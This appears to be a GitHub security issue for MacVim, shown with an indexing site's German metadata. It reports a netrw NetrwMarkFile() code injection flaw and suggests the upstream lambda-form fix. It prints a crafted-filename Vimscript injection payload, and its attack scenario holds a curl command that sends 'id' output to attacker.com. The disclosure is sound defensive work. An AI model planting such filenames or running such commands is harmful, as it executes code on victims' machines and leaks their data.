macvim-dev / macvim-dev/macvim

[Security] MacVim affected by GHSA-66hr-7p6x-x5j3 — netrw NetrwMarkFile() code injection via crafted filename (vim < 9.2.0480)

Offen
#1,656 0 Kommentare 0 Reaktionen 0 zugewiesene Personen Auf GitHub ansehen

Dieses Issue hat noch niemand übernommen.

Vorherrschende Sprache
Vim Script
Sterne
7.9k
Forks
691
PR-Merge-Kennzahlen
Keine gemergten PRs in 30 T.

Beschreibung

Summary

MacVim bundles the netrw plugin (runtime/pack/dist/opt/netrw/autoload/netrw.vim) which contains s:NetrwMarkFile() with a code injection vulnerability. When unmarking files from the global marked-file list, a filename is interpolated into a string expression passed to filter(), allowing a crafted filename containing a double quote " to break out of the quoted string and execute arbitrary Vimscript. The fix from vim 9.2.0480 (8af0f098c3a42a28661d0295364e6e0fd7dbc92c) has not been applied to macvim r183.

Vulnerability Details

  • GHSA: GHSA-66hr-7p6x-x5j3
  • CVE: CVE-2026-43961
  • Upstream fix (vim): 9.2.0480 (commit 8af0f098c3a42a28661d0295364e6e0fd7dbc92c, 2026-05-14)
  • Affected code: runtime/pack/dist/opt/netrw/autoload/netrw.vims:NetrwMarkFile()
  • Vulnerability type: CWE-94 — Code Injection

Root Cause

In s:NetrwMarkFile(), when a file is unmarked from the global marked-file list, dname (the full path derived from directory + filename) is interpolated directly into a filter() string expression:

" runtime/pack/dist/opt/netrw/autoload/netrw.vim line 5220 (macvim r183)
call filter(s:netrwmarkfilelist,'v:val != "'.dname.'"')

If dname contains a " character, the string literal breaks and arbitrary Vimscript executes inside filter(). For example, a file named:

x" . execute("silent! !touch /tmp/pwned") . "

generates:

call filter(s:netrwmarkfilelist,'v:val != "x" . execute("silent! !touch /tmp/pwned") . ""')

which executes silent! !touch /tmp/pwned.

A second vulnerable call at line 7239 uses the same pattern:

call filter(w:netrw_treedict[dir],'v:val !~ "'.escape(pat,'\\').'"')
Attack Scenario
  1. Attacker places a maliciously named file in the project directory:
    touch 'x" . execute("silent! !curl http://attacker.com/$(id)") . "'
    
  2. Victim opens the directory in MacVim's netrw (:Explore), marks the file with mf, then unmarks it with mf again.
  3. The second mf triggers the filter() removal path — injected Vimscript executes arbitrary shell commands.

Verification

$ grep -n "filter.*netrwmarkfilelist" runtime/pack/dist/opt/netrw/autoload/netrw.vim
5179:    call filter(s:netrwmarkfilelist_{curbufnr},'v:val != a:fname')
5220:    call filter(s:netrwmarkfilelist,'v:val != "'.dname.'"')

Line 5220 interpolates dname into the filter string. The fix has not been applied:

$ git log --all --oneline | grep -i "9.2.0480\|NetrwMarkFile"
(no output)

Suggested Fix

Merge vim patches up to at least 9.2.0480. The fix converts string-based filter() calls to lambda form:

" Fixed (vim 9.2.0480):
call filter(s:netrwmarkfilelist_{curbufnr}, {_, v -> v !=# a:fname})
call filter(s:netrwmarkfilelist, {_, v -> v !=# dname})
call filter(w:netrw_treedict[dir], {_, v -> v !~# pat})

References

Beitragsleitfaden

Beitragsleitfaden öffnen

Erste Schritte

  1. Lies das ganze Issue und danach den Beitragsleitfaden des Projekts.
  2. Schreib ins Issue, dass du es übernimmst — das erspart doppelte Arbeit.
  3. Forke das Repository und arbeite in einem Branch.
  4. Öffne einen Pull Request, der die Issue-Nummer nennt.

Rechercherichtung

Beginne in runtime/pack/dist/opt/netrw/autoload/netrw.vim bei s:NetrwMarkFile(), insbesondere bei den filter()-Aufrufen um die Zeilen 5220 und 7239. Vergleiche diese Aufrufstellen mit dem Vim-Commit 8af0f098c3a42a28661d0295364e6e0fd7dbc92c und teste anschließend den :Explore-Markierungs-/Aufhebungsfluss von netrw mit einem Dateinamen, der ein doppeltes Anführungszeichen enthält. Erledigt ist die Aufgabe, wenn der speziell erstellte Dateiname über keinen der beiden filter-Pfade mehr Vimscript ausführt.

Vom Indexierungsmodell aus dem Issue-Text verfasst.

Bewertung

Tech-Stack
vim
Bereich
security
Issue-Typ
Bug
Schwierigkeit
3/5
Geschätzter Aufwand
1-2 Tage
Aktivitätsstatus
Ruhig
Klarheit
Klar beschrieben
Anfängerfreundlichkeit
72/100

Neue Issues direkt in Ihr Postfach

Eine kurze Übersicht über anfängerfreundliche GitHub-Issues.